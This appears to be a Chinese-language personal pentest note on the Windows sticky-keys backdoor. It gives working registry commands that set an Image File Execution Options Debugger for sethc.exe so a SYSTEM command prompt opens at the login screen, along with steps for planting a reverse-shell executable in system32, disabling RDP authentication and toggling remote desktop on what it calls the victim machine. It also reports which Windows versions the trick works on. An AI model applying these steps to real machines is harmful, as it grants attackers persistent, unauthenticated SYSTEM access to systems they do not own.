粘滞键后门

参考资料

失败的操作

1
2
3
4
5
cd c:\windows\system32
move sethc.exe sethc.exe.bak			#重命名sethc.exe为sethc.exe.bak
copy /y cmd.exe sethc.exe
全都提示拒绝访问
本地管理员权限不行、system权限也不行。

成功的操作

1
2
3
4
5
6
7
move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe   #将p.exe移动到另一个地址,p.exe是一个反弹shell的exe.

#需要本地管理员权限
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

#在登陆面板输入5个shift,即可获得反弹的system权限shell
缺点,在登陆以后,就会丢失反弹连接。

使用场景:在3389远程登陆的时候,无需登陆,调出system权限cmd.exe

实验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
在受害机器设置user authentication,不需要验证。那么其他机器登入的时候,就会无需验证获得登陆面板。
PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0

---
受害机器替换cmd.exe,在登陆面板5个shift调出cmd.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

---
管理员权限命令开启3389远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

windows 10 无效
windows 2008 R2 有效